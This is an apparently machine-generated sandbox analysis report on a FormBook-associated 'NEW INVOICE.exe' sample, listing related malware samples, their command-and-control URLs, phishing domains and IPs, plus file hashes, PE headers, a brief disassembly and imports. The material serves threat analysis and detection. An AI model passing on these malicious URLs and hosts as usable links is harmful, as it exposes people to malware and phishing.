                                                                                  PO098765678.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.wearenotgoingback.info/p273/
                                                                                  http://sharepoint-heroldlaw.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • sharepoint-heroldlaw.com/
                                                                                  September Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.wearenotgoingback.info/k94d/
                                                                                  1V8XAuKZqe.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.document-help.com/04u1/?Uj=GjN54/rEQdbG6wox13WVIJujwOfJiTO4plPVo3IW4WRqWNsQMCiLBkfbiJZOLx5Jr1TAUrJD16WcM0wD/ixmx82XNtlig0HOb2v44zuO/KoVtd/B0OdcdCo=&Fj=mfqDg
                                                                                  Etisalat Summary Bill for the Month of August.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.wheresthechocolateat.com/pt46/?BXIxB=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9Y4XXWGvNLo&-ZYp=fvRlPd_pa8MLs2
                                                                                  206.238.91.127FSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                                  • www.jvkw3r8qi6kf67e.buzz/de94/
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.cctv9.restshipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 114.134.188.182
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CST-AS-APCAMBODIANSINGMENGTELEMEDIACOLTDKHshipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 114.134.188.182
                                                                                  gEMSIEpwB7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 43.252.80.166
                                                                                  f1Am6eCgwR.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                  • 111.92.243.131
                                                                                  uDQWmosR8J.elfGet hashmaliciousUnknownBrowse
                                                                                  • 115.178.25.122
                                                                                  doc_invoice_no20233004.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 114.134.188.88
                                                                                  TzIrVCurxt.elfGet hashmaliciousUnknownBrowse
                                                                                  • 111.92.240.98
                                                                                  nuklear.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 103.242.13.10
                                                                                  sTHGNAHaEy.elfGet hashmaliciousUnknownBrowse
                                                                                  • 43.252.80.168
                                                                                  DIDnHMFV4i.dllGet hashmaliciousWannacryBrowse
                                                                                  • 203.80.170.27
                                                                                  lDnQSacZneGet hashmaliciousMiraiBrowse
                                                                                  • 43.252.80.168
                                                                                  M247GBQuotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                  • 172.111.244.100
                                                                                  Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                                                                  • 172.111.244.100
                                                                                  na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 38.206.46.29
                                                                                  17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                  • 185.236.203.101
                                                                                  na.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 185.236.203.101
                                                                                  file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                  • 193.109.85.31
                                                                                  file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                  • 193.109.85.31
                                                                                  Booking_0106.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.86.66.70
                                                                                  DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 185.236.203.101
                                                                                  81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                  • 82.102.27.163
                                                                                  COGENT-174USinvoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                  • 38.240.44.9
                                                                                  xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 38.50.28.156
                                                                                  z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                                                  • 38.55.251.233
                                                                                  SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                  • 38.55.251.233
                                                                                  Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                  • 38.47.233.65
                                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                  • 38.47.232.144
                                                                                  http://tiktok1api.goodpay.buzz/Get hashmaliciousUnknownBrowse
                                                                                  • 154.39.150.40
                                                                                  http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 38.91.45.7
                                                                                  2qWIvXORVU.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 38.43.41.200
                                                                                  na.elfGet hashmaliciousSliverBrowse
                                                                                  • 38.55.193.31
                                                                                  AMAZON-02UShttps://issuu.com/smart_media/docs/die_welt_wirtschaft/19Get hashmaliciousUnknownBrowse
                                                                                  • 3.78.168.176
                                                                                  xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 82.192.101.168
                                                                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                  • 44.235.225.65
                                                                                  xd.arm.elfGet hashmaliciousMiraiBrowse
                                                                                  • 173.231.89.243
                                                                                  High Court Summons Notice.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 52.49.114.115
                                                                                  SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                  • 76.223.105.230
                                                                                  IwoeBDAv8n.elfGet hashmaliciousGafgytBrowse
                                                                                  • 54.171.230.55
                                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                  • 76.223.67.189
                                                                                  Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                  • 76.223.105.230
                                                                                  https://nextmytelstraaucurelinkisityou.web.app/Get hashmaliciousUnknownBrowse
                                                                                  • 54.66.224.79
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Users\user\Desktop\NEW INVOICE.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):286720
                                                                                  Entropy (8bit):7.99582251835774
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:kHt0HhBgxqp4DeLNOqn6L129Li5sIzz/MATGw6Po+LdZK3nf:kNQgxRDeYq6529knkAqw6PLLdZK3f
                                                                                  MD5:3D3D20187D7E61A3AC0BD41290E86DD7
                                                                                  SHA1:9C4A78B242484A178EE5E385A9E7D5EE0CD6C043
                                                                                  SHA-256:752543B71789EE2DE43531E3C743F489C144DBA0EDF046515D3850D28D103E04
                                                                                  SHA-512:C77FCDF8619A8BEF2909DB475AE03364ACF70E461255034DF202C71435C3D37B0388541557F8C363133215004623179A5EE07CCDF68A35EF083340F07DBDB661
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.c}..TD5Fl..;..~.VQ....;A...5F40C2K96RBZVRWS298IUTD5F40C2K.6RBTI.YS.0.h.U..g`X*AkID=%(7?w0SWV&!t&PfFE-."W....v?87W.5D_pD5F40C228?..:1.j3U..)2.^....#U.#...f65.I...u53.g/WX~R,.6RBZVRWSb|8I.UE5.$I.2K96RBZV.WQ329BUT.1F40C2K96R.NVRWC298)QTD5.40S2K94RB\VRWS298OUTD5F40CRO96PBZVRWS09x.UTT5F$0C2K)6RRZVRWS2)8IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBt"7/'298..PD5V40C|O96BBZVRWS298IUTD5f40#2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40C2K96RBZVRWS298IUTD5F40
                                                                                  Process:C:\Windows\SysWOW64\setupugc.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.5135050238467205
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                  • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:NEW INVOICE.exe
                                                                                  File size:1'331'957 bytes
                                                                                  MD5:4720a64fa6c2a6e20e7fcc10b4338862
                                                                                  SHA1:9e2746919127176a0490ff9482486ad6ae186b20
                                                                                  SHA256:00d402dcd4dbb6504771e48514b95e5860966119a31f19fe68905ac8a78ea09b
                                                                                  SHA512:d448afa608c3706af1f04e721e8b87f7eba17cf75a629b67d4bd470d9e792ce175b1481b1a36b1456a874c82df99c5e0547c10f2ebc80af76c81c7040b82d567
                                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QL3qnIXHAyr/s7/rD+i/Rt5F/Q1IA5+ArsCud4:f3v+7/5QLZfSXRi1jtrgy
                                                                                  TLSH:8C55F112B7D680B6D9A339B12A7BE31AEB3475194337C4CBABE01F768E111405B3B761
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                                  Icon Hash:1733312925935517
                                                                                  Entrypoint:0x416310
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:0
                                                                                  File Version Major:5
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                                  Instruction
                                                                                  call 00007FE3408EBD3Ch
                                                                                  jmp 00007FE3408DFB0Eh
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                                  mov ecx, dword ptr [ebp+10h]
                                                                                  mov edi, dword ptr [ebp+08h]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007FE3408DFC9Ah
                                                                                  cmp edi, eax
                                                                                  jc 00007FE3408DFE3Ah
                                                                                  cmp ecx, 00000100h
                                                                                  jc 00007FE3408DFCB1h
                                                                                  cmp dword ptr [004A94E0h], 00000000h
                                                                                  je 00007FE3408DFCA8h
                                                                                  push edi
                                                                                  push esi
                                                                                  and edi, 0Fh
                                                                                  and esi, 0Fh
                                                                                  cmp edi, esi
                                                                                  pop esi
                                                                                  pop edi
                                                                                  jne 00007FE3408DFC9Ah
                                                                                  pop esi
                                                                                  pop edi
                                                                                  pop ebp
                                                                                  jmp 00007FE3408E00FAh
                                                                                  test edi, 00000003h
                                                                                  jne 00007FE3408DFCA7h
                                                                                  shr ecx, 02h
                                                                                  and edx, 03h
                                                                                  cmp ecx, 08h
                                                                                  jc 00007FE3408DFCBCh
                                                                                  rep movsd
                                                                                  jmp dword ptr [00416494h+edx*4]
                                                                                  nop
                                                                                  mov eax, edi
                                                                                  mov edx, 00000003h
                                                                                  sub ecx, 04h
                                                                                  jc 00007FE3408DFC9Eh
                                                                                  and eax, 03h
                                                                                  add ecx, eax
                                                                                  jmp dword ptr [004163A8h+eax*4]
                                                                                  jmp dword ptr [004164A4h+ecx*4]
                                                                                  nop
                                                                                  jmp dword ptr [00416428h+ecx*4]
                                                                                  nop
                                                                                  mov eax, E4004163h
                                                                                  arpl word ptr [ecx+00h], ax
                                                                                  or byte ptr [ecx+eax*2+00h], ah
                                                                                  and edx, ecx
                                                                                  mov al, byte ptr [esi]
                                                                                  mov byte ptr [edi], al
                                                                                  mov al, byte ptr [esi+01h]
                                                                                  mov byte ptr [edi+01h], al
                                                                                  mov al, byte ptr [esi+02h]
                                                                                  shr ecx, 02h
                                                                                  mov byte ptr [edi+02h], al
                                                                                  add esi, 03h
                                                                                  add edi, 03h
                                                                                  cmp ecx, 08h
                                                                                  jc 00007FE3408DFC5Eh
                                                                                  Programming Language:
                                                                                  • [ASM] VS2008 SP1 build 30729
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                  • [ C ] VS2005 build 50727
                                                                                  • [IMP] VS2005 build 50727
                                                                                  • [ASM] VS2008 build 21022
                                                                                  • [RES] VS2008 build 21022
                                                                                  • [LNK] VS2008 SP1 build 30729
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                  RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                  RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                  RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                  RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                  RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                  RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                  RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                  RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                  RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                  RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                  RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                  RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                  RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                  RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                  RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                  RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                  RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                  RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                  RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                  RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                  RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                  RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                  RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                  RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                  RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                  RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                  DLLImport
                                                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                  GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
